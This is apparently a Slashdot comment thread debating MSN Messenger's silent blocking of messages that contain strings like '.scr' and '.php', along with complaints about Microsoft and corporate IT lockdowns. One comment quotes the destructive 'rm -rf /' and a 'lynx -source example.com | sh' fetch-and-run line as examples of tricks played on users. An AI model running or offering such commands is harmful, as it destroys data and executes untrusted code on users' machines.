MSN Censors Your IM 287
Jamie ran across a story about censorship on MSN. Essentially, a number of suspicious strings result in silent failure of delivery. The strings are unsurprisingly things like .scr and .info. They've started maintaining a list if you're interested. Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.
Misleading headline (Score:3, Insightful)
Fix "automatically run code based on text message" (Score:0, Insightful)
Then, fix the rampant security holes in the entire OS that allow someone running as a random user to totally hose the entire OS installation. In other words - get where Unix was, oh, about twenty or thirty years ago.
The fact that M$ has disabled their own apps and OS from doing what they coded it to do is proof that their entire approach to developing software results in insecure products. Time and time again, we see that's true. This is just another example. Why do you "hate" someone who is merely pointing that out?
Priorities and mitigation (Score:4, Insightful)
Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects? If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time? There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.
This also assumes that the same organization even owns the bug in question. Not all of these defects may be Microsoft's problem to begin with. This might even be a MORE reasonable action for them to take, since they're doing "everything in their power" to fight the problem rather than just sitting on their hands waiting for a 3rd-party to correct their bug, and sitting on their hands longer waiting for the end user to update their software.
.INFO (Score:4, Insightful)
And if they didnt (Score:2, Insightful)
Not that im fond of them either, but it seems they cant win either way these days.
Re:With so many alternatives.. (Score:1, Insightful)
I don't need to use the official client, but sadly I must use some kind of program that connects to the MSN network now and then.
Re:The genius that is Microsoft... (Score:5, Insightful)
Fix what? (Score:5, Insightful)
Someone want to tell me how you fix a user who downloads and runs untrusted executable code?
I've seen plenty of Linux n00bs get tricked into running rm -rf /. Or lynx -source example.com | sh
MSN implementing filters on certain strings is just a small measure in a huge arms race any major IM system has to deal with.
PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS.
Re:MSN does some weiiiiiird things... (Score:3, Insightful)
Re:Blocked firefox.exe (Score:3, Insightful)
Part of It's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then thats too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.
Re:The genius that is Microsoft... (Score:1, Insightful)
Re:Blocked firefox.exe (Score:3, Insightful)
Now, if you come up with a valid business need for said non standard software, and its ignored, then we are in agreement.
Re:Blocked firefox.exe (Score:5, Insightful)
What if it steps on what I need to do my job? I'm glad I don't work for you. You seem to be one of those types that thinks that just because something can be done, it needs to be done. Pushing down the default page doesn't protect the corporate computing assets, though I'm sure that's how our desktop goobers pitched it to management. It's just one more way to control things they have no business controlling, and it impacts our productivity.
They also do thinks like push down custom Start Menu structures. Microsoft Word, for example, isn't under All Programs or even Microsoft Office like it is on every other computer. No, it's buried under "Office Applications" (not to be confused with "Business Applications," a separate directory), along with things like Adobe Acrobat and such. They've also moved Windows Explorer (the filesystem explorer, not Internet Explorer) under Accessories. If I change this to something I'm more used to, it gets reverted next time I log in. Obviously, they've also deleted and blocked Solitaire and Minesweeper from running; it wouldn't do for people to take a break from hammering their stones. The company logo is pushed out to be everyone's desktop background.
My favorite, though, is that they've decided that everyone needs a little application called Kontiki. It's a peer-to-peer video distrubtion software system that turns all of our PCs into filesharing peers for corporate videos. You can't disable it and you can't delete the videos that it pushes down. (If you try to deleting a video, the software automatically re-downloads it from--you guessed it--your coworkers computers.) I detest days when corporate videos go out. My bandwidth is sucked dry by something I neither want nor use and have no control over.
Let's see... Need more stories? How about this. They recently pushed out a piece of software called Connected Backup. What happened is that our fileservers where people's home directories were started filling up. Instead of going out and buying more hard drives or implementing quotas, they've rolled out this backup software to everyone's computer that automatically backs up your machine once a day whether you want it to or not. Now, they're telling everyone that official company policy is to NOT store important documents on the fileservers, but to store them on your local PCs. Brilliant! Of course, network traffic has shot up dramatically, and the backup servers had to have a TON of storage added to them (the data still has to go somewhere), and instead of only things that people save on the fileservers being backed up, all of their personal shit is, too.
Every day, my computer runs a Connected backup, a virus scan, a vulnerability scan, a document retention scan, a software installation scan, Notes database replication, and my Run key in the registry has around 50 entries in it that our desktop group has loaded in, and it takes around two minutes for all of the group policies and login scripts to run when I log in. Thanks to our desktop group, literally 30 minutes of my day is wasted waiting for all of that shit to run.
I could go on with the stupidity if you really want me to. You're right about one thing; they've definitely protected the corporate computing assets. People hate using their computers so much now that a lot of people I know have gone back to just leaving it on all the time for doing their timesheets, and conduct their normal business using such old school methods such as the telephone and pencil and paper. As for me, I actually do some of my work at home using my own computing resources, and the only reason I can tolerate using my work computer for anything is because I know how to get around most of the shit they try to push down on us.
Re:Blocked firefox.exe (Score:3, Insightful)
And in a well run shop, even if you got permission to run it, the IT department would have to install it for you. You wouldn't be downloading it yourself.
Once you grow up and have to support 40000 users, you might understand that things are different in the business world then they are at home.
Vulnerabilities (Score:3, Insightful)
Worse, after they get their own machine hacked, they'll blame MSN. They'll contact whatever 'customer service' facility is provided and scream bloody murder. If they manage to get fired as a result they may even sue. Don't doubt that there are employers capable of getting litigious with MSN over it, also.
Sadly, this is the reality of operating an IM/Email/SMS service [ubergoth.net] today. Look carefully at that graphic realize that it is not an exaggeration.
The Solution! (Score:5, Insightful)
Apply some idea of "common carrier" status to MSN. Like the telephone companies, as long as they do not attempt to edit or censor the content that passes through their networks, in any way, then they are not responsible and cannot be held liable for any damage caused by such content. But the moment they start taking measures like this to try to "sanitize" the content of the network, make them legally liable to pay damages for any successful attack/exploit that they are unable to prevent.
Overnight, this stupidity would go away. It would also set a great precedent for any other companies that wish to do this.
Re:-gasp- Slashdot, too! (Score:4, Insightful)
During the controversy, one of the newspapers (Boston, I think) ran through one of the loudest critics prior speeches and found that he'd used it in the past, as well.
Just because SOME people are that special combination of both ignorant and loud, it shouldn't change the way educated people communicate.
Re:Blocked firefox.exe (Score:2, Insightful)
"Hello, helpdesk? Website X isn't working. What? It's working for you? Then there is something wrong with this computer. I want to file a help ticket now."
We're probably up over twenty dollars already and haven't even sent someone out to look at this guy's computer yet.
Re:Anybody else notice its .php files that get ... (Score:3, Insightful)
Also the php files are in the document_root directory (or whatever you want to call it).
Yeah, on the server - then they could exploit the server hosting them... Why on earth would MS care about that? They're doing the filtering to protect the end-users from exploits of vulnerabilities in the MSN client. It doesn't matter the least bit if it's PHP, Perl, Ruby, ASP or whatever that runs on the server-side - it's what is returned from the server-side that matters. I'll have to agree with the guy guessing that PHP is usually the first choice of scripting language for script kiddies.
And as the first poster noted, TinyURLs get through just fine, plus it'd be the least of problems to make a HTTP redirect, so http://example.com/harmless.script [example.com] points to http://example.com/malicious.script?that=pwns&MSN= users [example.com]. This way of "fixing" bugs is nothing but retarded - it fixes nothing and it hassles end-users a great deal - some of those substrings that are getting blocked are VERY common.
Re:The genius that is Microsoft... (Score:3, Insightful)
Anyone that I have any relation with knows that I will not contact them via MSN, AIM, My Space, Live Journal or any of their like. If they wish to communicate they can call me on the phone or send an email. If they push the point, I suggest that they learn to use IRC or obtain a HAM radio license with a morse code rating, and I will gladly send them an instant message. Most have selected the telephone as their main choise, but one now holds a General class license. I view them pushing their "favorite" method onto me insulting and expect them to feel the same. If they do not find a medium that is commonly available and required for business communications as aceptable, then I really don't want to be associated with them.
Re:Blocked firefox.exe (Score:2, Insightful)
explains
Hell, for that matter I've yet to work for a company with a helpdesk.
As it's impossible to call a non-existent helpdesk.
So your opinion is, therefore,
Bullshit
as you are unqualified to express one in this situation.
Sorry, no cigar this time. Nice try, though.
Re:Blocked firefox.exe (Score:2, Insightful)
However, I've found IT is sometimes used to take care of problems that are really the domain of management or HR, and in this case you generally have to focus on the lowest common denominator. Say you have an employee who's really, really good at what he does, and has gone above and beyond tasked duties a number of times for the company. His skill set alone makes him difficult to replace, especially at what he's currently being paid. However, he has the bad habit of coming in at 6AM and downloading porn on company computers, because he has a wife and kids at home. How did we find out? the startup page being changed to a porn site, as well as several minor adware installations. "Um I don't know how this happened!!" This was when we instituted several new technology policies, including a content-filter as well as a GPO-set home page. Fortunately our startup page only contains links to the most-used work related sites, and google. But it still pissed off people who wanted to catch the news headlines every time they opened their browser.
I've had similar issues with webmail, screensavers, backgrounds, partypoker, ebay, solitaire and similar programs, the list goes on. It's sad that many people can't get it through their heads that when they're at work they're being paid to work, not work when it's convenient for them. It's also sad that these problems have to be solved via technology instead of management addressing them directly. I've found that to be the origin of many IT "control" policies in my brief experience, and they only tend to make problems worse. You have a secretary in a cubicle who spends half an hour a day (paid) on myspace, and instead of her receiving some sort of formal reprimand, you're instructed to block myspace at the proxy server. She then wastes an hour per day - half of it trying to get around the filter with various proxies, the other half taking care of her social business. Management's response? "well, we'll lose more productivity firing her and training someone else than keeping her on", like there's no middle ground.
To me it seems like your company is attempting a piss-poor attempt at increasing productivity by decreasing the opportunities for distraction. They're probably the type who think their way of doing things is the most efficient and forcing that upon everyone else is a good thing (such as those custom folders brought up). I've been on the other side of that coin when an employee was having issues with yahoo directions, when we had a copy of mappoint 2k7 as well as google earth on their computer. It's tricky business, and sometimes it's difficult to foresee when you might step on a user's toes, especially the rare advanced user.
As for the rest of the stuff your IT department does, such as video sharing, well, erm, see article on using linux at work?
Re:Oh please. (Score:2, Insightful)
Microsoft censored the words to stop those stupid worms going over everyones msn account, you know those stupid viruses that say, "i found a pic of you at www.somewhere.com/download.php?name=virus" and then some silly teenage girl would go, OMG REALLY and click on it, now she has the virus and its telling all her contacts the name thing.
So how do they put a stop to this, just censor the bloody url so the message wont send.
Some of you guys on slashdot just have got to realise that MOST PEOPLE WHO USES COMPUTERS ARE _NOT_ AS SMART AS YOU! Some wont update there programs, others wont know how to remove the virus and even more will click on stupid links like that.